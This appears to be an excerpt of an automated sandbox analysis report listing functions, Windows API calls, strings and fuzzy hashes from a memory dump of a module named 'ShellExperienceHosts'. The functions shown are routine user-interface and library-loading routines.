shell32.dll, xrefs: 6C9D45B7
InitNetworkAddressControl, xrefs: 6C9D45C6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: InitNetworkAddressControl$shell32.dll
API String ID: 2061474489-1950653938
Opcode ID: cf8eea62668d2fc068ddbf7f1f087e1dc3fb2cb4aff99bafde1ed6e832f95a11
Instruction ID: a2f2a3735a87a5cf4afa2e29113f91b35662f3a0c68500109d687032376b8449
Opcode Fuzzy Hash: cf8eea62668d2fc068ddbf7f1f087e1dc3fb2cb4aff99bafde1ed6e832f95a11
Instruction Fuzzy Hash: 79E09235B16AB39F8F211BB4B80C85E37BCBF466553024432F80AE3900DB34DE019EA0

Function 6C9D3F25 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6C9D3F34
GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C9D3F44
EncodePointer.KERNEL32(00000000), ref: 6C9D3F4D
DecodePointer.KERNEL32(00000000), ref: 6C9D3F5B

Strings

BufferedPaintInit, xrefs: 6C9D3F3E
uxtheme.dll, xrefs: 6C9D3F2F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: BufferedPaintInit$uxtheme.dll
API String ID: 2061474489-1331937065
Opcode ID: 7eab0917ec9e4b12695746b4f8b4479dbdc26934ab66a48c97be881c3b2e507c
Instruction ID: 2800e8511b8be8f4e459ca4e42ad8b3a14346d738c5419bdcc629fcc038bd72e
Opcode Fuzzy Hash: 7eab0917ec9e4b12695746b4f8b4479dbdc26934ab66a48c97be881c3b2e507c
Instruction Fuzzy Hash: DCE06575B069766B9F206B79B80C94D37BCBF466963024022F80AE3900D724D9018AE1

Function 6C9D3F7A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6C9D3F89
GetProcAddress.KERNEL32(00000000,BufferedPaintUnInit), ref: 6C9D3F99
EncodePointer.KERNEL32(00000000), ref: 6C9D3FA2
DecodePointer.KERNEL32(00000000), ref: 6C9D3FB0

Strings

BufferedPaintUnInit, xrefs: 6C9D3F93
uxtheme.dll, xrefs: 6C9D3F84

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: BufferedPaintUnInit$uxtheme.dll
API String ID: 2061474489-1501038116
Opcode ID: d5662cd1419210510c0617fa7d182ea7fbfb3a019b4e1061c872d6ae9c8ec9be
Instruction ID: fd649b38d10f470b7df33b966102e7ba1cd476b4e054f7d4fde3e7202a67df29
Opcode Fuzzy Hash: d5662cd1419210510c0617fa7d182ea7fbfb3a019b4e1061c872d6ae9c8ec9be
Instruction Fuzzy Hash: F4E0657574667A6BDF205738BC0895D3ABCBF476563020455F809F3A40D724D9018AA1

Function 6C9D45FF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6C9D460E
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6C9D461E
EncodePointer.KERNEL32(00000000), ref: 6C9D4627
DecodePointer.KERNEL32(00000000), ref: 6C9D4639

Strings

TaskDialogIndirect, xrefs: 6C9D4618
comctl32.dll, xrefs: 6C9D4609

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: TaskDialogIndirect$comctl32.dll
API String ID: 2061474489-2809879075
Opcode ID: 3f15888f88d2e5ce72d99771404ddb41544df980da139c0e09d51fb83bdfa718
Instruction ID: b93bb928a6eb30fe75afcc92e3f9e78517eebfc4781cd95d3b00173f8accb323
Opcode Fuzzy Hash: 3f15888f88d2e5ce72d99771404ddb41544df980da139c0e09d51fb83bdfa718
Instruction Fuzzy Hash: 5BE048357076729F9F105BB4B90C89E36FDAF576A63464461FC05E3600E724C9005EA0

Function 6C9D4B29 Relevance: 10.5, APIs: 7, Instructions: 25COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6C9D4B2E
GetSysColor.USER32(00000010), ref: 6C9D4B39
GetSysColor.USER32(00000014), ref: 6C9D4B44
GetSysColor.USER32(00000012), ref: 6C9D4B4F
GetSysColor.USER32(00000006), ref: 6C9D4B5A
GetSysColorBrush.USER32(0000000F), ref: 6C9D4B65
GetSysColorBrush.USER32(00000006), ref: 6C9D4B70

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: eeea5ebb985174cb52ba996645b77e93ca6ef42d7ceca8e9cccdb782663dd480
Instruction ID: 71c81b7bec82d75f7792028cff4e06344b94214b9f132f8cb239f5d049411f51
Opcode Fuzzy Hash: eeea5ebb985174cb52ba996645b77e93ca6ef42d7ceca8e9cccdb782663dd480
Instruction Fuzzy Hash: 21F07471B527409FEB706FB1A54D78A7EB0FF49711F001929E28A8B984E7B6A080DF40

Function 6C9E631A Relevance: 9.3, APIs: 6, Instructions: 333COMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 6C9E63A2
GetClientRect.USER32(?,6C9E5D4B), ref: 6C9E63B5
GetWindowRect.USER32(00000000,?), ref: 6C9E63FF
GetParent.USER32(00000000), ref: 6C9E6408
GetParent.USER32(00000000), ref: 6C9E669B
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,?,?,?,?,?,?,6C9E5D4B,00000000), ref: 6C9E66CB

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Parent$RectWindow$ClientRedraw
String ID:
API String ID: 443302174-0
Opcode ID: 4cbdd2d83a8fb532a3a20f873f27eb52594a152ed103bd3bb03e4bd0d441d499
Instruction ID: a227adaec6d89be2bc3152822fb5906f057dd8266f59ae0fe1fa9726a2646709
Opcode Fuzzy Hash: 4cbdd2d83a8fb532a3a20f873f27eb52594a152ed103bd3bb03e4bd0d441d499
Instruction Fuzzy Hash: 7ED14635B00619DFCF06CFA8C898AAE7BB5BF5D714F244169E916AB690DB30E940CF50

Function 6C9F7B5F Relevance: 9.3, APIs: 6, Instructions: 293windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6C9F7C8F
GetWindowRect.USER32(?,?), ref: 6C9F7CA3
PtInRect.USER32(?,?,?), ref: 6C9F7CCC
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9F7CE0

Part of subcall function 6C9B97AD: GetParent.USER32(?), ref: 6C9B97B7

SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9F7D42
GetFocus.USER32 ref: 6C9F7E69

Part of subcall function 6CA1EBD9: __EH_prolog3_GS.LIBCMT ref: 6CA1EBE3
Part of subcall function 6CA1EBD9: GetWindowRect.USER32(?,?), ref: 6CA1EC77
Part of subcall function 6CA1EBD9: SetRect.USER32(?,00000000,00000000,?,?), ref: 6CA1EC98
Part of subcall function 6CA1EBD9: CreateCompatibleDC.GDI32(?), ref: 6CA1ECA4
Part of subcall function 6CA1EBD9: CreateCompatibleBitmap.GDI32(?,?,00000128), ref: 6CA1ECCE
Part of subcall function 6CA1EBD9: GetWindowRect.USER32(?,?), ref: 6CA1ED23
Part of subcall function 6CA1EBD9: GetClientRect.USER32(?,?), ref: 6CA1ED30

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Window$CompatibleCreateMessageSend$BitmapClientCursorFocusH_prolog3_Parent
String ID:
API String ID: 2914356772-0
Opcode ID: f72a290a3b56af02f7f2b5ec83efd53d0a96fd0397641bd7cd294ab5aa0aec56
Instruction ID: a42c040c8e045392cf01ca560ebe7726e68f2a6c81a4a6c53bfd80eccc53b9a9
Opcode Fuzzy Hash: f72a290a3b56af02f7f2b5ec83efd53d0a96fd0397641bd7cd294ab5aa0aec56
Instruction Fuzzy Hash: FFA1F235B016569FEF149F61C894AAE77B9BF55318F15006ED825ABB50DF30EC02CBA0

Function 6C9C477D Relevance: 9.2, APIs: 6, Instructions: 195COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6C9C47A2
InflateRect.USER32(?,?,?), ref: 6C9C47BE
PtInRect.USER32(?,?,?), ref: 6C9C4826
PtInRect.USER32(?,?,?), ref: 6C9C4878
PtInRect.USER32(?,?,?), ref: 6C9C48D7
PtInRect.USER32(?,?,?), ref: 6C9C493E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$ClientInflate
String ID:
API String ID: 256450704-0
Opcode ID: ae02ff222e918ae175fdf1799d9c5b8cd9aac3fc85ef100d038eec6a10a39d68
Instruction ID: 9fdb0a6ee890f271139791cfddf8c800981293e16246e8341beb90d90570a5a5
Opcode Fuzzy Hash: ae02ff222e918ae175fdf1799d9c5b8cd9aac3fc85ef100d038eec6a10a39d68
Instruction Fuzzy Hash: 96711971F006599BDB04CFA9C984AEEB7F6BF59304F148169E819E7210D731EA42CF92

Function 6C9F6EB2 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 438windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9F6EBC
IsMenu.USER32(?), ref: 6C9F6EF0

Part of subcall function 6CA07F82: __EH_prolog3_catch.LIBCMT ref: 6CA07F89
Part of subcall function 6CA07F82: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000074,6C9F6F18,?,00000000), ref: 6CA07FBD

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 6C9F701D

Strings

Recent File, xrefs: 6C9F6FCD
&%d %Ts, xrefs: 6C9F70E3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CurrentDirectoryFileH_prolog3_H_prolog3_catchMenuPointer
String ID: &%d %Ts$Recent File
API String ID: 1008316149-993655659
Opcode ID: b0ce5dfd0e5dafa21ffcf73ef560149924d8dbdd75e974954792b110d96c2e07
Instruction ID: 68a59e960ee467d17c83109a9830c0dce27b46bb4bb91849ea7c026ffb51d291
Opcode Fuzzy Hash: b0ce5dfd0e5dafa21ffcf73ef560149924d8dbdd75e974954792b110d96c2e07
Instruction Fuzzy Hash: 75026C70A112299BDF16CB24C894BADB7BABF48314F1441E9D819A7781DB70EF86CF50

Function 6C9E5B7D Relevance: 9.2, APIs: 6, Instructions: 167windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 6C9E5C0B
SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 6C9E5C47
SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 6C9E5C7A
SetRectEmpty.USER32(?), ref: 6C9E5CE0
SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 6C9E5D3C
RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 6C9E5D6B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageSend$EmptyParentRectRedrawWindow
String ID:
API String ID: 3879113052-0
Opcode ID: 487c4139b923a319c3307978393ca7fae2588ecea06f7b3eb7a0f8096eaa080a
Instruction ID: 365219c47a8c75c5869ae5d5e2fa69253f9cd1618c5b89a1efcf504b767c9c12
Opcode Fuzzy Hash: 487c4139b923a319c3307978393ca7fae2588ecea06f7b3eb7a0f8096eaa080a
Instruction Fuzzy Hash: BA518D74F016199FDB29CF64C894BAEBBB5FF58704F20412AE416A7781DB70A940CF80

Function 6C9D03A6 Relevance: 9.1, APIs: 6, Instructions: 145windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9D042B
IsWindow.USER32(?), ref: 6C9D04A6
ClientToScreen.USER32(?,?), ref: 6C9D04B7
IsWindow.USER32(?), ref: 6C9D04D5
ClientToScreen.USER32(?,?), ref: 6C9D0505
SendMessageW.USER32(?,0000020A,?,?), ref: 6C9D0563

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClientMessageScreenSendWindow
String ID:
API String ID: 2093367132-0
Opcode ID: c63e6527b6ed5a76808382a620fc2a1bfd2f541f7b8d0bc693e958054447b9d6
Instruction ID: d0fd7e4e4d1b93b40b7ec78ade3952732bdff5c19b40d3309e5cf8cc7e846a2f
Opcode Fuzzy Hash: c63e6527b6ed5a76808382a620fc2a1bfd2f541f7b8d0bc693e958054447b9d6
Instruction Fuzzy Hash: 4D410531A14E81ABDB104FB5C948B6E7EBCEF16349F12A629F851F2D60E770F900C610

Function 6C9C9E56 Relevance: 9.1, APIs: 6, Instructions: 140windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BE4F7: GetWindowLongW.USER32(00000004,000000F0), ref: 6C9BE504

SendMessageW.USER32(?,0000043D,00000000,00000000), ref: 6C9C9EFC
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C9C9F0D
SendMessageW.USER32(?,0000043C,00000001,00000000), ref: 6C9C9F21
SendMessageW.USER32(?,0000043C,00000000,00000000), ref: 6C9C9F32
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C9C9F41
InvalidateRect.USER32(?,00000000,00000001,00000000,?,00000000,?,?,?,?,?,6C9C8BDF,00000000,?,?,?), ref: 6C9C9FD4

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageSend$InvalidateLongRectWindow
String ID:
API String ID: 74886174-0
Opcode ID: e978e4ce9a3d8489de4e9e2c1f2d9b10e64b37b3b35c448250734a670d88d96a
Instruction ID: aeb1266b0d61acb812bb5ad8119e2e6d440481c6a2f706a0e1a52af841c6d3d8
Opcode Fuzzy Hash: e978e4ce9a3d8489de4e9e2c1f2d9b10e64b37b3b35c448250734a670d88d96a
Instruction Fuzzy Hash: 58419931700258ABEB158FA0CC99FEE7B79BF4A714F040155FA09AB690DB70A851CB91

Function 6C9DE978 Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 6C9DE982
SetCapture.USER32(?), ref: 6C9DE996
GetCapture.USER32 ref: 6C9DE9A2
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C9DE9C0
DispatchMessageW.USER32(?), ref: 6C9DE9FC
GetCapture.USER32 ref: 6C9DEA5A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: cb3e5a423e9ca8f3bcc7c7908b0e6518d46ca3471145186c0726dbdc7ddbeea0
Instruction ID: 1854b0d375cf6f66eedf63e92daaa9aeb86b33d8733e7411d07bdb9482cd5a3b
Opcode Fuzzy Hash: cb3e5a423e9ca8f3bcc7c7908b0e6518d46ca3471145186c0726dbdc7ddbeea0
Instruction Fuzzy Hash: 5B317471650D07DBCF209F7889889AEFAB8FF66708B52C555A055F2A40CB30F544CAF2

Function 6C9FA1FD Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 6C9FA225
OffsetRect.USER32(?,?,?), ref: 6C9FA246
SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 6C9FA253
IsWindowVisible.USER32(00000000), ref: 6C9FA25C
SendMessageW.USER32(00000000,0000000B,00000001,00000000), ref: 6C9FA2CF
RedrawWindow.USER32(00000000,00000000,00000000,00000105), ref: 6C9FA2DF

Part of subcall function 6C9BE89F: ShowWindow.USER32(?,?,00000000,?,6C9C24AD,00000000,?,?,?,?,?,?,?,6C9C1FF8,00000000,000000FF), ref: 6C9BE8B0

Part of subcall function 6C9BE7EE: SetWindowPos.USER32(?,?,?,3E6EA3C2,6C9BEBAD,?,6C9BF24C,00000000,?,6C9C23ED,00000000,00000000,00000000,00000000,00000000,00000097), ref: 6C9BE816

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$MessageRectSend$OffsetRedrawShowVisible
String ID:
API String ID: 2359670889-0
Opcode ID: d31776c0ae5f1943b08615896551ea383ad2170471e4aec0292c8c59ae551edc
Instruction ID: c0e7f6618e00eb15766614b8811c3e84f800243bb5a4f47279767536c59953a9
Opcode Fuzzy Hash: d31776c0ae5f1943b08615896551ea383ad2170471e4aec0292c8c59ae551edc
Instruction Fuzzy Hash: 26312972A00249BFEB11DBA4CD85EBFBBBDFF48704F000559B556E6590DB70AD008B20

Function 6C9F83B3 Relevance: 9.1, APIs: 6, Instructions: 86timeCOMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 6C9F83D2
ReleaseCapture.USER32 ref: 6C9F83E0
PtInRect.USER32(?,?,?), ref: 6C9F8435
InvalidateRect.USER32(?,?,00000001), ref: 6C9F849F
SetTimer.USER32(?,0000EC16,00000050,00000000), ref: 6C9F84C3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$CaptureInvalidateReleaseTimer
String ID:
API String ID: 2903485716-0
Opcode ID: 8e179f84250d2c3ce56ae4175c2daf9b29ea5d34eed34448e3223e33621e1d97
Instruction ID: 9da5cf7a1c9e4bd42037915d15f250c3a53e231fdf0389a7b7860b7089cfda85
Opcode Fuzzy Hash: 8e179f84250d2c3ce56ae4175c2daf9b29ea5d34eed34448e3223e33621e1d97
